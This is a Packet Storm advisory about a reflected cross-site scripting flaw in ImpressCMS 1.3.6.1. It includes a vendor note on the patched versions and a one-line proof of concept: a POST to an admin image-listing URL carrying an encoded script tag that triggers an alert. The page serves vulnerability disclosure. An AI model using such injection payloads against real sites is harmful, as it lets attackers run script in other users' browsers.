ImpressCMS version 1.3.6.1 suffers from a reflective cross site scripting vulnerability. The vendor has contacted Packet Storm and has noted that versions 1.3.7 and 1.2.9 have been released to address these issues.
9bad6116e496aa4e3d49adffacb2753381461b97bdb2e4149c1c3048a57f3746# Exploit Title: ImpressCMS 1.3.6.1 Reflected XSS
# Date: 05/28/2014
# Author: Mustafa ALTINKAYNAK
# Download URL : http://www.impresscms.org
# Software Link: http://www.impresscms.org/content.php?page=Download
# Vuln Category: CWE-79 (XSS)
# Tested on: ImpressCMS 1.3.6.1
# Tested Local Platform : XAMP on Windows 8
# Patch/ Fix: Not published.
---------------------------
Technical Details
---------------------------
http://www.target.com/modules/system/admin.php?fct=images&op=listimg&imgcat_id=1
POST {query=%22%3E%3Cscript%3Ealert%28%221%22%29%3B%3C%2Fscript%3E}
---------------------------
Mustafa ALTINKAYNAK
twitter : @m_altinkaynak <http://twitter.com/m_altinkaynak>
www.mustafaaltinkaynak.com
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed